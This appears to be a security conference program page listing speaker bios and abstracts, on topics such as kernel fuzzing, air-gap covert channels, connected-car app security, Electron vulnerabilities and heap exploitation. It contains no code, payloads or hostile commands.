In practice we found tens of vulnerabilities with CVE numbers, and many kernel crashes, which confirms the effectiveness of the fuzzing. We also constructed two different Local Privilege Escalation exploits to get root on Mac OS X (10.11.3) using some of those vulnerabilities.
Below is the list of CVEs and ZDI identifiers so far (NOT including submitted but pending): CVE-2015-3787, CVE-2015-5867, CVE-2015-7021, CVE-2015-7020, CVE-2016-1716, ZDI-CAN-3536, ZDI-CAN-3558, ZDI-CAN-3598, ZDI-CAN-3596, ZDI-CAN-3603, CVE-2015-7067, CVE-2015-7076, CVE-2015-7106, CVE-2015-7109, CVE-2016-1718, CVE-2016-1747, CVE-2016-1749, CVE-2016-1753, ZDI-CAN-3693, ZDI-CAN-3694, CVE-2016-1795, CVE-2016-1808, CVE-2016-1810, CVE-2016-1817, CVE-2016-1820, CVE-2016-1798, CVE-2016-1799, CVE-2016-1812, CVE-2016-1814, CVE-2016-1818, CVE-2016-1816
Mordechai Guri
TBA
Yisroel Mirsky
Yisroel Mirsky is a Ph.D. candidate supervised by Prof. Bracha Shapira and Prof. Yuval Elovici, in the department of Information Systems Engineering in Ben-Gurion University. Over the last two years he has taught cyber security machine learning at international venues, and has published works in the domains of anomaly detection, isolated network security, and machine learning. He currently manages two multi-year research projects in the Cyber Security Research Center (CSRC) at BGU: Context-based Data-leakage Prevention for Smartphones (funded by the Israeli Ministry of Science), and Machine Learning solutions for IoT security (in cooperation with the industry). His research interests include: machine learning, time-series anomaly detection, isolated network security, smartphone security and physical signal cryptography.
Yuval Elovici
TBA
Air-gapped networks are isolated, separated both logically and physically from public networks; examples are military, industrial and financial networks. Although the feasibility of invading such systems has been demonstrated in recent years, communicating data to and from air-gapped networks is a challenging task for attackers to perpetrate, and an even more difficult threat to defend against.
New methods of communicating with air-gapped networks are currently being exposed, some of them advanced and difficult to mitigate. These newly found vulnerabilities have wide-reaching implications for what we considered to be a foolproof network security solution: the placement of a physical air gap.
But it doesn't stop there: new techniques for covertly getting information into and out of air-gapped networks are being exposed. It is therefore important to publicize not only these attack vectors but also their countermeasures and feasibility.
In this talk we will outline the steps an attacker must take in order to bridge an air-gapped network. We will review the state-of-the-art techniques over thermal, radio and acoustic channels, and discuss each one's countermeasures and feasibility. Most of the techniques in this talk were discovered in our labs by researcher Mordechai Guri under the supervision of Prof. Yuval Elovici.
After working as a network engineer on software quality evaluation, test automation and development for network equipment (Gigabit Ethernet and multilayer switches), he joined FFRI, Inc. in 2013. At FFRI he has worked on security testing and on surveying and analyzing cyber-attack trends, and is now a researcher studying threat analysis and penetration-testing methods for embedded devices, centred on automobiles. Spoke at CODE BLUE 2015.
In recent years, services that remotely obtain a vehicle's location (GPS) and control the vehicle have been increasing, led by electric vehicles.
For automotive OEMs these are ambitious services that may add considerable value to the vehicle.
At the same time, for automobiles, which until now had no connection to networks such as the Internet where they communicate with an unspecified number of other devices, the arrival of such services exposes them to new threats and so creates new risks.
Indeed, in the short period since 2015 a number of problems with such services have already been reported.
All of these problems were identified outside Japan, but what about the Japanese market?
We therefore analyzed the client apps that domestic and foreign OEMs provide for Japan and evaluated them for vulnerabilities in areas such as inter-app communication and certificate validation for network connections, as well as for the adoption of anti-analysis techniques such as obfuscation that prevent attackers from discovering and exploiting such problems through reverse engineering.
At present, however, only a limited number of OEMs in Japan provide services that can remotely control some vehicle functions, the kind of service for which problems have been pointed out.
This presentation therefore covers apps for the US market as well as for Japan, and explains our evaluation of the current state of app security measures, the potential for future exploitation based on those results, and the countermeasures needed going forward.
Olga Kochetova
TBA
Alexey Osipov
TBA
TBA
Peter Hlavaty
Peter is a Lead for Windows Kernel Research at Keen Lab of Tencent (originally known as KEEN Team), with a primary focus on vulnerability discovery and the development of novel exploitation techniques. He has presented his research at various conferences such as Recon, SyScan, ZeroNights, NoSuchCon and others. Prior to Keen, Peter was an AV (ESET) guy; with 4+ years of experience in that field he switched to offensive software security research focused on Windows and Linux kernel architectures. Pwnie nominee and Pwn2Own 2015 & 2016 (Master of Pwn) winner, and occasionally a CTF player. Besides the software security field, he does his best as a wushu player as well.
Jin Long 金龙
Tencent Keen Security Lab researcher with 6 years of programming experience and 4 years of security experience. Former Trend Micro employee, now focused on Windows security research at Keen Security Lab. Pwn2Own 2016 winner (Master of Pwn, with the final Edge to SYSTEM escape).
(Japanese translation to follow)
Recently our team researched various ntos subsystem attack vectors, and we will present one of the outputs in our talk. DeathNote is our internal code name for this component, which resides in the Microsoft Windows kernel, hiding behind different interfaces and exposed to users in different ways.
What can go bad with it?
Basically there are two kinds of problems; the first is syscall handling via direct user interaction. We will describe how to obtain a basic understanding of what's going on, how it interacts with other components and what its purpose is. With that knowledge we will dig deeper into how to build more complex fuzzing logic to cause enough chaos to end up in unexpected behaviors in the Windows kernel, and demonstrate some of them.
And as for the second, as the title hints, this module does a bit of data parsing, so we will dive deep into the internals, pointing out some available materials, and move on to reverse-engineered structures and internal mechanisms. We will show how some tricks can produce various results, and how a structured approach can expose more problems than expected.
(TBA)
TBA
(TBU)
TBA
(Japanese translation to follow)
Tyler has been a computer hacker for several years. While an undergraduate student at Carnegie Mellon University, Tyler was one of the initial members of the hacking team known as the Plaid Parliament of Pwning. This team rose from a small group of students to the number one competitive hacking team in the world. After traveling around the world competing in hacking competitions, Tyler settled down and now works on making humans and computers think more like hackers at ForAllSecure. In 2016, the automated system he helped create won the DARPA Cyber Grand Challenge.
(Japanese translation to follow)
The Cyber Grand Challenge (CGC) was announced in 2013, a first-of-its-kind competition in which fully autonomous systems would compete in a Capture The Flag (CTF) tournament. Starting from over 100 teams consisting of some of the top security researchers and hackers in the world, only 7 teams qualified for the final round. These 7 teams competed against each other to guard their own software with IDS rules and software patches while attacking the other systems. All of this was done without access to program source code or access to humans.
This never-before-seen level of autonomy demonstrated the state of the art in areas of computer security including static analysis, automated bug finding, automatic exploit generation, and automatic software patching. Over the course of just 10 hours, these systems competed to analyze over 80 totally new pieces of software, showing capabilities beyond what anyone has ever seen before.
In this talk we will discuss the Cyber Grand Challenge, explaining what it entailed, what the results mean, and how these advances will influence software security in the near future. Additionally, we will share lessons learned from the winning CGC team, and take a look at the future of automatic software analysis.
Full-time technical advisor at Secure Sky Technology Inc.
Has discovered numerous vulnerabilities in web applications as well as in Internet Explorer and Mozilla Firefox. Has given many talks, including at Black Hat Japan 2008, POC 2008 and 2010 (Korea), and OWASP AppSec APAC 2014.
OWASP Kansai Chapter Leader / OWASP Japan Board member
Electron is a framework for easily building desktop applications for Windows, OS X, and Linux, and is used to develop popular applications such as Atom Editor, Visual Studio Code, and Slack. By bundling Chromium and node.js, Electron lets web application developers build desktop applications with the techniques they are used to; on the other hand, it has many security problems, for example a single DOM-based XSS anywhere in the application easily leads to arbitrary code execution, and in fact the speaker has to date discovered and reported many vulnerabilities in well-known Electron applications that allow arbitrary code execution.
This session aims to organize and explain the security problems that commonly arise when developing with Electron.
A rookie analyst at Cyber Defense Institute and a member of the CTF team TokyoWesterns.
As a student he studied electronic engineering at the National Institute of Technology, Tokyo College, and, as his hobby grew, threw himself into CTF.
He is most in his element at the moment of pwning an application or while listening to cool music, and also likes eating good food with people.
Lately he is interested in malloc() implementations, attacks on embedded systems, and other things related to pwning.
If some data that is sensitive to a buffer overflow, such as a function pointer, resides in a dynamically allocated region, a heap-based buffer overflow can be considered about as exploitable as a stack-based buffer overflow. However, because memory layout differs from application to application, a remote attacker cannot tell whether it is really exploitable. For that reason one could say that attacks on heap-based buffer overflows are not that practical, but they are extremely interesting, so let us focus on them.
Obtaining the program counter in order to execute arbitrary code is one of an attacker's goals, and attackers sometimes achieve it through a "write-what-where primitive" (writing arbitrary data to an arbitrary location). There was a classic attack technique called the Unlink Attack that provided a direct "write-what-where primitive", but mitigations have since been put in place and it can no longer be used. Exploit writers therefore devised techniques that realize an indirect "write-what-where primitive" by forcing the return value of malloc() to an almost arbitrary address. Heap exploitation techniques with an indirect "write-what-where primitive" include the Malloc Maleficarum (the attack techniques and paper by Phantasmal Phantasmagoria). Some of these have already been fixed, but others remain effective.
This time, I would like to propose "House of Einherjar" as a new attack technique that is effective even on the latest GLIBC and provides an indirect "write-what-where primitive".
(Japanese translation to follow)
Sophia D’Antoine is a security engineer at Trail of Bits in NYC and a graduate of Rensselaer Polytechnic Institute. She is a regular speaker at security conferences around the world, including RECon, HITB, and CanSecWest. Her present work includes techniques for automated software exploitation and software obfuscation using LLVM. She spends too much time playing CTF and going to noise concerts.
(Japanese translation to follow)
This talk will explore program analysis on compiled code, where source is not available. Many static program analysis tools, such as LLVM passes, depend on the ability to compile source to bytecode, and cannot operate on binaries. A solution to this problem will be explained and demonstrated using the new Intermediate Language (IL) in Binary Ninja. Binary Ninja IL will be described, providing a basic understanding of how to write analyses using it.
This talk will describe and release a tool in Binary Ninja IL for automated discovery of a simple memory corruption vulnerability and demonstrate it on a CTF binary. The concepts of variable analysis, abstract interpretation, and integer range analysis will be discussed in the context of vulnerability discovery.